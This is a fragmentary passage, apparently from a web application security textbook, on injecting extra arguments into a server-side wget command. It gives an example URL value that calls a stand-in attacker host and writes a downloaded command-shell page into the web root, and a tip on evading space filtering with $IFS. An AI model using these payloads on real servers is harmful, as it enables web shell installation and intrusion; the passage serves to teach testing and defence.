application may contain a function in which the server retrieves a user-

wget

-O

command-line parameter used by 

wget

. For example:

url=http://wahh-attacker.com/%20-O%20c:\inetpub\wwwroot\

scripts\cmdasp.asp

T I P

Many command injection attacks require you to inject spaces to separate

command-line arguments. If you find that spaces are being filtered by the

application, and the platform you are attacking is Unix-based, you may be able

to use the 

$IFS